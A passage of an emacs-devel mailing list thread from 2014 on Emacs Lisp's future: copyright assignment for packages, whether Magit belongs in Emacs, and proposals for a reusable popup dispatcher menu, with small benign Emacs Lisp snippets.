want those rules because it restricts "openness". But when you relax the rules you open yourself to attack. I'm not trying to be histrionic. I'm just saying it's there. There are things we could do to battle the potential problem, making it easier to assign copyright might be one thing. Nic ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-19 11:38 ` Nic Ferrier @ 2014-09-19 18:02 ` Richard Stallman 0 siblings, 0 replies; 404+ messages in thread From: Richard Stallman @ 2014-09-19 18:02 UTC (permalink / raw) To: Nic Ferrier; +Cc: magnars, stephen, rasmus, emacs-devel [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] Giving freedom to users is an explicit goal of GNU Emacs. "Openness" is not a goal. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-19 10:46 ` Stephen J. Turnbull 2014-09-19 11:12 ` David Kastrup 2014-09-19 11:38 ` Nic Ferrier @ 2014-09-19 11:53 ` Rasmus 2 siblings, 0 replies; 404+ messages in thread From: Rasmus @ 2014-09-19 11:53 UTC (permalink / raw) To: emacs-devel Hi Stephen, "Stephen J. Turnbull" <stephen@xemacs.org> writes: > Nic Ferrier writes: > > > I am torn between a much more open and distributed Emacs (which I > > suspect rms won't like) > > What's not open or distributed about Emacs? Maintaining legal > paperwork is a cost and an inconvenience, but the GPL itself legally > guarantees openness and in practice Emacs development is highly > distributed. ELPA is only going to provide more cases where people > want to "sign papers", or to gather "papers" from their coauthors. I > can't see this as a problem -- Emacs will acquire more copyrights than > it would have otherwise. > [...] Perhaps a more realistic issue is if something that should be in core cannot be. Say "next Org" (or whatever...) emerges and everybody agrees that it should be in core. Developers of "next Org" sign the paperwork. But "next Org" depends on "popular foreign library". Now you've got an issue. The Emacs tarball is no longer enough and I need to maintain a portable installation including an init file with "popular foreign repo" to get to work on, say, foreign PCs. It is an issue whether infant "next Org" knows it's "next Org". If it knows, it cannot use "popular foreign library" although it would enhance development. If it doesn't know it's "next Org" you may end up in the scenario above. At the moment 146 packages depends on s or dash and can thus not be included in core unless rewritten. Assuming they all GPL'ed it may not be a loss of freedom in the short run, but it can still have negative dynamic effects. > > But that's what we did when we introduced packages. How else did > > people think it would end? > > Huh? Packages simply are a way of making long-standing practices > (development and distribution by satellite projects) more convenient > for end users, permitting multiple development cycles for "core" > modules if desired by the core developers, and to some extent blurring > the line between core-developer and end-user convenience. Agreed. > [...] > The practical problem created by packages is (to some eyes) a blessing > in disguise. By enabling convenient separate development and > distribution of many more Lisp packages than would otherwise exist, > separate from Emacs core, it "exports" many APIs that would otherwise > be considered internal. [...]. One does not preclude the other. Last I checked Company was hosted on github. Org and Gnus live in separate repos. The API argument goes over my head. Isn't the only API in questions #autoload of functions? Or do you have Richard comment on changing functions in mind? If disputing the latter, it has been pretty convenient for Org. Nicolas (the author of ox, the org exporter) has changed all exporter in org-core and org-contrib at once, after making changes to ox. That option is very convenient when implementations have yet to reach the (theoretical) limit of efficiency — however that's measured. Cheers, Rasmus -- May the Force be with you ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-19 8:00 ` Nic Ferrier 2014-09-19 10:46 ` Stephen J. Turnbull @ 2014-09-19 18:01 ` Richard Stallman [not found] ` <<E1XV2UO-0005CA-Vk@fencepost.gnu.org> 2 siblings, 0 replies; 404+ messages in thread From: Richard Stallman @ 2014-09-19 18:01 UTC (permalink / raw) To: Nic Ferrier; +Cc: magnars, rasmus, emacs-devel [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] My understanding is that Magnars lost control of contributors to s and dash some time ago. Getting people to sign papers will be hard. If some contributors don't sign papers, and their contributions are big enough to be legally significant, we may need in some cases to rewrite their contributions. We should get good packages into Emacs early, to prevent this sort of problem from developing. And we should warn the developers that if they don't do this, it will cause problems for our support for their packages. I recommend we set up a group of volunteers to look for new packages at an early (one developer or just a few) that seem promising, and talk with them about proceeding to get those packages into Emacs soon. We should reject the "ecosystem" viewpoint, making it clear that Emacs consists of what's in the Emacs and ELPA repositories; other people's Lisp programs are not Emacs. We should discourage package developers from depending on packages that are not in Emacs, warning them that this would cause trouble for us and we will be peeved at them. To some extent, we have exacerbated the problem by recommending the packages that are outside Emacs too eagerly. See "Where can I get Emacs Lisp packages that don't come with Emacs?" in the Emacs FAQ. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
[parent not found: <<E1XV2UO-0005CA-Vk@fencepost.gnu.org>]
* RE: Emacs Lisp's future [not found] ` <<E1XV2UO-0005CA-Vk@fencepost.gnu.org> @ 2014-09-19 18:43 ` Drew Adams 0 siblings, 0 replies; 404+ messages in thread From: Drew Adams @ 2014-09-19 18:43 UTC (permalink / raw) To: rms, Nic Ferrier; +Cc: magnars, rasmus, emacs-devel > Emacs consists of what's in the Emacs and ELPA repositories; > other people's Lisp programs are not Emacs. Nonsense. You might as well claim they are not Lisp either! ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 14:34 ` Phillip Lord 2014-09-18 15:01 ` Rasmus @ 2014-09-18 23:17 ` Richard Stallman 2014-09-19 0:03 ` Rasmus 1 sibling, 1 reply; 404+ messages in thread From: Richard Stallman @ 2014-09-18 23:17 UTC (permalink / raw) To: Phillip Lord; +Cc: rasmus, emacs-devel [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] Once Emacs switches to git, I would guess the percentage of people on this list who do not install magit will shrink to a tiny number. What is magit? Why is it preferable to using VC? And why is it not in Emacs? -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 23:17 ` Richard Stallman @ 2014-09-19 0:03 ` Rasmus 2014-09-19 10:27 ` Eric S. Raymond ` (2 more replies) 0 siblings, 3 replies; 404+ messages in thread From: Rasmus @ 2014-09-19 0:03 UTC (permalink / raw) To: rms; +Cc: jonas, emacs-devel The following message is a courtesy copy of an article that has been posted to gmane.emacs.devel as well. Richard Stallman <rms@gnu.org> writes: > [[[ To any NSA and FBI agents reading my email: please consider ]]] > [[[ whether defending the US Constitution against all enemies, ]]] > [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > > Once Emacs switches to git, I would guess the percentage of people on > this list who do not install magit will shrink to a tiny number. > > What is magit? In their own words Magit is an interface to the version control system Git, implemented as an Emacs extension. Unlike Emacs' native Version Control package which strives to provide a unified interface to various version control systems, Magit only supports Git and can therefore better take advantage of its native features. It has so very nice features but it very git-centric. For instance in the diff-view you can stash (precommit) only a subset of changed lines, effectively splitting your uncommited work into several patches easily. > Why is it preferable to using VC? A while ago VC was not good for git. I think I remember having issues with committing several files in one commit and with branches way back with VC. There has been some recent patches for VC-git so it's probably better now. I haven't tested VC recently (I mostly use the command line). Magit has a lot of traction by now. > And why is it not in Emacs? The current maintainer is Jonas Bernoulli (Cc) and the original author is Marius Vollmer. —Rasmus -- Slowly unravels in a ball of yarn and the devil collects it ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-19 0:03 ` Rasmus @ 2014-09-19 10:27 ` Eric S. Raymond 2014-09-23 7:45 ` Emilio Lopes 2014-09-26 16:50 ` Jonas Bernoulli 2 siblings, 0 replies; 404+ messages in thread From: Eric S. Raymond @ 2014-09-19 10:27 UTC (permalink / raw) To: Rasmus; +Cc: jonas, rms, emacs-devel Rasmus <rasmus@gmx.us>: > > Why is it preferable to using VC? > > A while ago VC was not good for git. I think I remember having issues > with committing several files in one commit and with branches way back > with VC. I fixed the multi-file commit issue in 2006. If there is still some issue with brances, please explain so I can fix it. -- <a href="http://www.catb.org/~esr/">Eric S. Raymond</a> ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-19 0:03 ` Rasmus 2014-09-19 10:27 ` Eric S. Raymond @ 2014-09-23 7:45 ` Emilio Lopes 2014-09-26 16:50 ` Jonas Bernoulli 2 siblings, 0 replies; 404+ messages in thread From: Emilio Lopes @ 2014-09-23 7:45 UTC (permalink / raw) To: Emacs-Devel devel; +Cc: Rasmus 2014-09-19 2:03 GMT+02:00 Rasmus <rasmus@gmx.us>: > Richard Stallman <rms@gnu.org> writes: >> What is magit? > […] > It has so very nice features but it very git-centric. For instance in > the diff-view you can stash (precommit) only a subset of changed > lines, effectively splitting your uncommited work into several patches > easily. An a side remark: I've tried magit sometime ago found it sluggish. These days I'm pretty satisfied with the integration provided by `vc' and git itself. It's nice to read git's docs in `woman' when you write `git commit --help'. For editing diffs, just use `git add -e' and you can use the excellent (and underused) `diff-mode' to manipulate the patch your heart's content. Alternatively one can edit the output from `vc-diff' directly and use `commit-patch' (http://porkrind.org/missives/commit-patch-managing-your-mess) to commit it out of the Emacs buffer. This approach also works for svn, bzr etc. btw. Here is a trivial integration of `git grep': (defun git-grep (command-args) "Use the `grep' machinery to run `git grep'." (interactive (let ((sap (thing-at-point 'symbol)) (grep-command "git grep -n ")) (list (read-shell-command "Run git grep (like this): " (if sap (concat grep-command sap) grep-command))))) (compilation-start (concat "< /dev/null " command-args) 'grep-mode)) Emílio ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-19 0:03 ` Rasmus 2014-09-19 10:27 ` Eric S. Raymond 2014-09-23 7:45 ` Emilio Lopes @ 2014-09-26 16:50 ` Jonas Bernoulli 2014-09-26 18:23 ` Christopher Allan Webber 2014-09-26 20:37 ` Stefan Monnier 2 siblings, 2 replies; 404+ messages in thread From: Jonas Bernoulli @ 2014-09-26 16:50 UTC (permalink / raw) To: Rasmus; +Cc: emacs-devel >> And why is it not in Emacs? > The current maintainer is Jonas Bernoulli (Cc) Thanks for inviting me to the conversation. Short answer: I agree that it would be desirable for Magit to be part of Emacs or (less so) GNU Elpa. But I would like to delay this conversation until after Magit 2.1.0 and Emacs 24.4 have been released, and the Emacs repository has been migrated to Git. Longer answer: I am to busy to tackle this now. Also I don't think that Magit should be added to Emacs asap, as a whole, and in its current form. I have read the remarks about packages not having to be done before being added to Elpa. But currently not even a releasable version of Magit exists. The stable branch contains many known defects and the development branch only very recently got to a point where a release became imaginable. But there are some serious bugs, and the documentation for the numerous new and improved features is non-existent). Instead of adding Magit as is, I would rather add certain components of Magit to Emacs itself (after sufficiently abstracting them) and move certain functionality into libraries that are already part of Emacs. Once Magit has been released I am also going write some new libraries to be used by Magit but also VC and other packages, such as `git-handler' (file handler for Git blobs and trees), `kit' (wrappers around Git commands commonly used in Emacs packages), and `libgit' (the same thing but using the yet-to-be-created ffi). But right now I am busy getting the development branch ready so that more than a dozen brave souls can benefit from the work I have done this year. Best regards, Jonas ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-26 16:50 ` Jonas Bernoulli @ 2014-09-26 18:23 ` Christopher Allan Webber 2014-09-29 8:33 ` Phillip Lord 2014-09-26 20:37 ` Stefan Monnier 1 sibling, 1 reply; 404+ messages in thread From: Christopher Allan Webber @ 2014-09-26 18:23 UTC (permalink / raw) To: Jonas Bernoulli; +Cc: Rasmus, emacs-devel Jonas Bernoulli writes: > Instead of adding Magit as is, I would rather add certain components of > Magit to Emacs itself (after sufficiently abstracting them) and move > certain functionality into libraries that are already part of Emacs. That would be great. There are some features of magit that would be really nice to have available for all packages by being bundled with emacs. The popup menu system is pretty much the best, for example. - Chris ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-26 18:23 ` Christopher Allan Webber @ 2014-09-29 8:33 ` Phillip Lord 2014-09-29 13:19 ` Stefan Monnier 2014-09-30 7:58 ` Thorsten Jolitz 0 siblings, 2 replies; 404+ messages in thread From: Phillip Lord @ 2014-09-29 8:33 UTC (permalink / raw) To: Christopher Allan Webber; +Cc: Jonas Bernoulli, Rasmus, emacs-devel Christopher Allan Webber <cwebber@dustycloud.org> writes: >> Instead of adding Magit as is, I would rather add certain components of >> Magit to Emacs itself (after sufficiently abstracting them) and move >> certain functionality into libraries that are already part of Emacs. > > That would be great. There are some features of magit that would be > really nice to have available for all packages by being bundled with > emacs. The popup menu system is pretty much the best, for example. It is really nice. There is a similar solution in org-mode (the export dispatcher) and even in auctex (which is simpler but generally works out the right thing to do for you). All of them are text, all of the fast and all of them easy to use (but slightly different). Having a generic library that could be reused by different packages would be great. Phil ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-29 8:33 ` Phillip Lord @ 2014-09-29 13:19 ` Stefan Monnier 2014-09-29 14:47 ` Phillip Lord 2014-09-30 7:58 ` Thorsten Jolitz 1 sibling, 1 reply; 404+ messages in thread From: Stefan Monnier @ 2014-09-29 13:19 UTC (permalink / raw) To: Phillip Lord Cc: Christopher Allan Webber, Jonas Bernoulli, Rasmus, emacs-devel >>> Instead of adding Magit as is, I would rather add certain components of >>> Magit to Emacs itself (after sufficiently abstracting them) and move >>> certain functionality into libraries that are already part of Emacs. >> That would be great. There are some features of magit that would be >> really nice to have available for all packages by being bundled with >> emacs. The popup menu system is pretty much the best, for example. > It is really nice. There is a similar solution in org-mode (the export > dispatcher) and even in auctex (which is simpler but generally works out > the right thing to do for you). FWIW, I don't use any of those things, so I don't really know what kind of "popup-menu" you're talking about. Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-29 13:19 ` Stefan Monnier @ 2014-09-29 14:47 ` Phillip Lord 0 siblings, 0 replies; 404+ messages in thread From: Phillip Lord @ 2014-09-29 14:47 UTC (permalink / raw) To: Stefan Monnier Cc: Christopher Allan Webber, Jonas Bernoulli, Rasmus, emacs-devel Stefan Monnier <monnier@iro.umontreal.ca> writes: >>>> Instead of adding Magit as is, I would rather add certain components of >>>> Magit to Emacs itself (after sufficiently abstracting them) and move >>>> certain functionality into libraries that are already part of Emacs. >>> That would be great. There are some features of magit that would be >>> really nice to have available for all packages by being bundled with >>> emacs. The popup menu system is pretty much the best, for example. >> It is really nice. There is a similar solution in org-mode (the export >> dispatcher) and even in auctex (which is simpler but generally works out >> the right thing to do for you). > > FWIW, I don't use any of those things, so I don't really know what kind > of "popup-menu" you're talking about. It's not a menu at all, but a buffer. Saying in magit, I hit "b", then I get a buffer "popping up" which looks like this.... Switches -t: Set upstream configuration (--track) -m: Merged to HEAD (--merged) -M: Merged to master (--merged=master) -n: Not merged to HEAD (--no-merged) -N: Not merged to master (--no-merged=master) Args =c: Contains (--contains=) =m: Merged (--merged=) =n: Not merged (--no-merged=) Actions v: Branch manager b: Checkout c: Create r: Rename k: Delete If I type "-t" (to set the -t option) then "--track" changes colour to pink, so I know that I have selected it. When I finally hit "c", git will be run to create a new branch with "--track" selected. Org-mode works similarly; I hit C-cC-e (org-export-dispatch) and I get [C-b] Body only: Off [C-v] Visible only: Off [C-s] Export scope: Buffer [C-f] Force publishing: Off [C-a] Async export: Off [c] Export to iCalendar [f] Current file [a] All agenda files [c] Combine all agenda files [h] Export to HTML [H] As HTML buffer [h] As HTML file [o] As HTML file and open [l] Export to LaTeX [L] As LaTeX buffer [l] As LaTeX file [p] As PDF file [o] As PDF file and open [t] Export to Plain Text [A] As ASCII buffer [a] As ASCII file [L] As Latin1 buffer [l] As Latin1 file [U] As UTF-8 buffer [u] As UTF-8 file [P] Publish [f] Current file [p] Current project [x] Choose project [a] All projects [&] Export stack [#] Insert template [q] Exit At the top we have options (although these don't equate to command line options as with magit). All the keys like [c], [h] but not f or H are highlighted. If I hit h, then the suboptions for Export to HTML light up. So C-xCehh gives me "Export as HTML file", C-x-C-eho means and open in a browser. I don't have to remember the options, because the menu guides me through the process. Auctex uses a normal complete on C-cC-c except that the default "Compile" or "View" is almost always correct. Phil ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-29 8:33 ` Phillip Lord 2014-09-29 13:19 ` Stefan Monnier @ 2014-09-30 7:58 ` Thorsten Jolitz 2014-09-30 12:19 ` Phillip Lord ` (2 more replies) 1 sibling, 3 replies; 404+ messages in thread From: Thorsten Jolitz @ 2014-09-30 7:58 UTC (permalink / raw) To: emacs-devel phillip.lord@newcastle.ac.uk (Phillip Lord) writes: > Christopher Allan Webber <cwebber@dustycloud.org> writes: >>> Instead of adding Magit as is, I would rather add certain components of >>> Magit to Emacs itself (after sufficiently abstracting them) and move >>> certain functionality into libraries that are already part of Emacs. >> >> That would be great. There are some features of magit that would be >> really nice to have available for all packages by being bundled with >> emacs. The popup menu system is pretty much the best, for example. > > It is really nice. There is a similar solution in org-mode (the export > dispatcher) and even in auctex (which is simpler but generally works out > the right thing to do for you). > > All of them are text, all of the fast and all of them easy to use (but > slightly different). Having a generic library that could be reused by > different packages would be great. I like these 'dispatcher popup-menus' too, they are a very nice UI feature in cases there are a lot of choices for the user. I once tried to reuse them in a project, but there is generally no separation of UI and logic, its all mixed up, so starting from scratch seemed easier than reusing what is already there. How would a generic UI generator look like in this case? Wouldn't it be very complicated to prompt the user for all the dispatcher-menu-UI properties? Where to put what on the dispatcher UI? May be an Org table would be a good input format: #+BEGIN_ORG | (key . fun) | | | |-------------+-------------+-------------| | | | | | (key . fun) | (key . fun) | (key . fun) | | (key . fun) | (key . fun) | | | | | | | (key . fun) | (key . fun) | | |-------------+-------------+-------------| | | (key . fun) | | #+END_ORG so that the user specifies the dispatcher-grid as an Org table, with hlines and key/function pairs, and a generic dispatcher-ui-generator function or macro then gets the nested-list representation of that Org table as argument: #+BEGIN_SRC emacs-lisp :results output raw (org-table-map-tables (lambda () (print (org-table-to-lisp)))) #+END_SRC #+results: (("(key . fun)" "" "") hline ("" "" "") ("(key . fun)" "(key . fun)" "(key . fun)") ("(key . fun)" "(key . fun)" "") ("" "" "") ("(key . fun)" "(key . fun)" "") hline ("" "(key . fun)" "")) or something like this, using the org-parser (untested): #+BEGIN_SRC emacs-lisp :results pp (org-element-map (org-element-parse-buffer) '(table table-row) 'identity) #+END_SRC -- cheers, Thorsten ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-30 7:58 ` Thorsten Jolitz @ 2014-09-30 12:19 ` Phillip Lord 2014-09-30 16:15 ` Nic Ferrier 2014-09-30 16:15 ` Nicolas Richard 2 siblings, 0 replies; 404+ messages in thread From: Phillip Lord @ 2014-09-30 12:19 UTC (permalink / raw) To: Thorsten Jolitz; +Cc: emacs-devel Thorsten Jolitz <tjolitz@gmail.com> writes: > phillip.lord@newcastle.ac.uk (Phillip Lord) writes: >> It is really nice. There is a similar solution in org-mode (the export >> dispatcher) and even in auctex (which is simpler but generally works out >> the right thing to do for you). >> >> All of them are text, all of the fast and all of them easy to use (but >> slightly different). Having a generic library that could be reused by >> different packages would be great. > > I like these 'dispatcher popup-menus' too, they are a very nice UI > feature in cases there are a lot of choices for the user. > > I once tried to reuse them in a project, but there is generally no > separation of UI and logic, its all mixed up, so starting from scratch > seemed easier than reusing what is already there. Yes, I would agree, although I would say that starting from scratch but with the agreement of the org and magit developers to replace their GUIs. > How would a generic UI generator look like in this case? Wouldn't it be > very complicated to prompt the user for all the dispatcher-menu-UI > properties? Where to put what on the dispatcher UI? A tree of property lists would be my way to go. Magit is, I think, something like this at the moment. > May be an Org table would be a good input format: > > > #+BEGIN_ORG > | (key . fun) | | | > |-------------+-------------+-------------| > | | | | > | (key . fun) | (key . fun) | (key . fun) | > | (key . fun) | (key . fun) | | > | | | | > | (key . fun) | (key . fun) | | > |-------------+-------------+-------------| > | | (key . fun) | | > #+END_ORG > > > > so that the user specifies the dispatcher-grid as an Org table, with hlines > and key/function pairs, and a generic dispatcher-ui-generator function > or macro then gets the nested-list representation of that Org table as > argument: > > > #+BEGIN_SRC emacs-lisp :results output raw > (org-table-map-tables > (lambda () (print (org-table-to-lisp)))) > #+END_SRC That would be a good addition, I think. Phil ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-30 7:58 ` Thorsten Jolitz 2014-09-30 12:19 ` Phillip Lord @ 2014-09-30 16:15 ` Nic Ferrier 2014-09-30 18:21 ` Thorsten Jolitz 2014-09-30 16:15 ` Nicolas Richard 2 siblings, 1 reply; 404+ messages in thread From: Nic Ferrier @ 2014-09-30 16:15 UTC (permalink / raw) To: Thorsten Jolitz; +Cc: emacs-devel Thorsten Jolitz <tjolitz@gmail.com> writes: > phillip.lord@newcastle.ac.uk (Phillip Lord) writes: > May be an Org table would be a good input format: > > #+BEGIN_ORG > | (key . fun) | | | > |-------------+-------------+-------------| > | | | | > | (key . fun) | (key . fun) | (key . fun) | > | (key . fun) | (key . fun) | | > | | | | > | (key . fun) | (key . fun) | | > |-------------+-------------+-------------| > | | (key . fun) | | > #+END_ORG You should totally do this. I'd love to play with it. Nic ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-30 16:15 ` Nic Ferrier @ 2014-09-30 18:21 ` Thorsten Jolitz 2014-09-30 19:18 ` Thorsten Jolitz 0 siblings, 1 reply; 404+ messages in thread From: Thorsten Jolitz @ 2014-09-30 18:21 UTC (permalink / raw) To: emacs-devel Nic Ferrier <nferrier@ferrier.me.uk> writes: > Thorsten Jolitz <tjolitz@gmail.com> writes: > >> phillip.lord@newcastle.ac.uk (Phillip Lord) writes: >> May be an Org table would be a good input format: >> >> #+BEGIN_ORG >> | (key . fun) | | | >> |-------------+-------------+-------------| >> | | | | >> | (key . fun) | (key . fun) | (key . fun) | >> | (key . fun) | (key . fun) | | >> | | | | >> | (key . fun) | (key . fun) | | >> |-------------+-------------+-------------| >> | | (key . fun) | | >> #+END_ORG > > > You should totally do this. I'd love to play with it. 'discover-context-menus' look like this: #+BEGIN_SRC emacs-lisp (dired (description "DIRectory EDitor") (actions ("Navigation" ("DEL" "unmark backward" dired-unmark-backward) ("RET" "find file" dired-find-file) ("SPC" "next line" dired-next-line) ("<" "prev dirline" dired-prev-dirline) (">" "next dirline" dired-next-dirline) ("^" "up directory" dired-up-directory) ("j" "goto file" dired-goto-file) ("i" "maybe insert subdir" dired-maybe-insert-subdir) ("n" "next line" dired-next-line) ("p" "previous line" dired-previous-line) ("v" "view file" dired-view-file) ("w" "copy filename as kill" dired-copy-filename-as-kill)) ...)) #+END_SRC and it could easily be derived form an org table: | Navigation | | | (DEL . dired-find-file) | (RET . dired-find-file)| -- cheers, Thorsten ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-30 18:21 ` Thorsten Jolitz @ 2014-09-30 19:18 ` Thorsten Jolitz 0 siblings, 0 replies; 404+ messages in thread From: Thorsten Jolitz @ 2014-09-30 19:18 UTC (permalink / raw) To: emacs-devel Thorsten Jolitz <tjolitz@gmail.com> writes: > Nic Ferrier <nferrier@ferrier.me.uk> writes: > >> Thorsten Jolitz <tjolitz@gmail.com> writes: >> >>> phillip.lord@newcastle.ac.uk (Phillip Lord) writes: >>> May be an Org table would be a good input format: >>> >>> #+BEGIN_ORG >>> | (key . fun) | | | >>> |-------------+-------------+-------------| >>> | | | | >>> | (key . fun) | (key . fun) | (key . fun) | >>> | (key . fun) | (key . fun) | | >>> | | | | >>> | (key . fun) | (key . fun) | | >>> |-------------+-------------+-------------| >>> | | (key . fun) | | >>> #+END_ORG >> >> >> You should totally do this. I'd love to play with it. > > 'discover-context-menus' look like this: > > #+BEGIN_SRC emacs-lisp > (dired > (description "DIRectory EDitor") > (actions > ("Navigation" > ("DEL" "unmark backward" dired-unmark-backward) > ("RET" "find file" dired-find-file) > ("SPC" "next line" dired-next-line) > ("<" "prev dirline" dired-prev-dirline) > (">" "next dirline" dired-next-dirline) > ("^" "up directory" dired-up-directory) > ("j" "goto file" dired-goto-file) > ("i" "maybe insert subdir" dired-maybe-insert-subdir) > ("n" "next line" dired-next-line) > ("p" "previous line" dired-previous-line) > ("v" "view file" dired-view-file) > ("w" "copy filename as kill" dired-copy-filename-as-kill)) ...)) > #+END_SRC > > and it could easily be derived form an org table: > > > | Navigation | | > | (DEL . dired-find-file) | (RET . dired-find-file)| [Ups, sorry ... did C-c C-c in the table, but wasn't in Org-mode but in message-mode, so sent the message accidentally] Calling 'org-table-to-lisp on this table | Navigation | | | DEL dired-find-file | RET dired-find-file | yields: (("Navigation" "") ("DEL dired-find-file" "RET dired-find-file")) Using that as arg for this (imperfect) mapping function #+BEGIN_SRC emacs-lisp (defun tj/org-tbl-to-context-menu (org-tbl-as-lisp) (mapcar (lambda (--row) (mapcar (lambda (--cell) (let ((cell-split (split-string --cell " " t))) (if (eq (length cell-split) 2) (list (car cell-split) (mapconcat 'identity (split-string (cadr cell-split) "\\(?:dired\\)?-" t) " ") (intern (cadr cell-split))) cell-split))) --row)) org-tbl-as-lisp)) #+END_SRC yields something (at least somehow) similar to 'discover-context-menus': #+BEGIN_SRC emacs-lisp ((("Navigation") nil) (("DEL" "find file" dired-find-file) ("RET" "find file" dired-find-file))) #+END_SRC but to make it useful, makey.el would need to consider empty tbl-cells as well as empty tbl-rows as well as hlines when drawing the UI grid. -- cheers, Thorsten ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-30 7:58 ` Thorsten Jolitz 2014-09-30 12:19 ` Phillip Lord 2014-09-30 16:15 ` Nic Ferrier @ 2014-09-30 16:15 ` Nicolas Richard 2014-09-30 17:54 ` Thorsten Jolitz 2 siblings, 1 reply; 404+ messages in thread From: Nicolas Richard @ 2014-09-30 16:15 UTC (permalink / raw) To: Thorsten Jolitz; +Cc: mickey, emacs-devel Thorsten Jolitz <tjolitz@gmail.com> writes: > How would a generic UI generator look like in this case? Wouldn't it be > very complicated to prompt the user for all the dispatcher-menu-UI > properties? Where to put what on the dispatcher UI? Look into the packages "makey" and "discover". The former was factored out of magit and discover was built on top of that. See: http://www.masteringemacs.org/articles/2013/12/21/discoverel-discover-emacs-context-menus/ I don't know how "makey" and the corresponding magit code relate nowadays. I hope they cooperate, but I have no idea. Mickey Petersen (cc'ed) might tell us more about the current state. -- Nicolas Richard ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-30 16:15 ` Nicolas Richard @ 2014-09-30 17:54 ` Thorsten Jolitz 2014-09-30 18:19 ` Drew Adams 0 siblings, 1 reply; 404+ messages in thread From: Thorsten Jolitz @ 2014-09-30 17:54 UTC (permalink / raw) To: emacs-devel Nicolas Richard <theonewiththeevillook@yahoo.fr> writes: > Thorsten Jolitz <tjolitz@gmail.com> writes: >> How would a generic UI generator look like in this case? Wouldn't it be >> very complicated to prompt the user for all the dispatcher-menu-UI >> properties? Where to put what on the dispatcher UI? > > Look into the packages "makey" and "discover". The former was factored > out of magit and discover was built on top of that. > > See: > http://www.masteringemacs.org/articles/2013/12/21/discoverel-discover-emacs-context-menus/ > > I don't know how "makey" and the corresponding magit code relate > nowadays. I hope they cooperate, but I have no idea. Mickey Petersen > (cc'ed) might tell us more about the current state. Never heard of these packages, so I just tried to use discover/makey with dired for the first time - wow! Having this kind of UI for all of Emacs would be marvellous, because being unable to remember all those keybindings and being too lazy to look them up is probably the most limiting factor when using Emacs. With this kind of UI everywhere, missing long-term memory and natural lazyness could be beaten ... -- cheers, Thorsten ^ permalink raw reply [flat|nested] 404+ messages in thread
* RE: Emacs Lisp's future 2014-09-30 17:54 ` Thorsten Jolitz @ 2014-09-30 18:19 ` Drew Adams 0 siblings, 0 replies; 404+ messages in thread From: Drew Adams @ 2014-09-30 18:19 UTC (permalink / raw) To: Thorsten Jolitz, emacs-devel > > http://www.masteringemacs.org/articles/2013/12/21/discoverel- > > discover-emacs-context-menus/ > > Never heard of these packages, so I just tried to use discover/makey > with dired for the first time - wow! > > Having this kind of UI for all of Emacs would be marvellous, because > being unable to remember all those keybindings and being too lazy to > look them up is probably the most limiting factor when using Emacs. > With this kind of UI everywhere, missing long-term memory and natural > lazyness could be beaten ... Yes, this kind of thing is very helpful. FWIW - Looks like (a subset of) Icicles key completion, to me. It is a subset because it is done partially: only for some particular modes or key prefixes (e.g. Dired mode, `C-x r' prefix). Icicles key completion works for all keys, and even for menu-bar bindings. http://www.emacswiki.org/EmacsNewbieWithIcicles#KeyHelpAndCompletion http://www.emacswiki.org/Icicles_-_Key_Completion ^ permalink raw reply [flat|nested] 404+ messages in thread
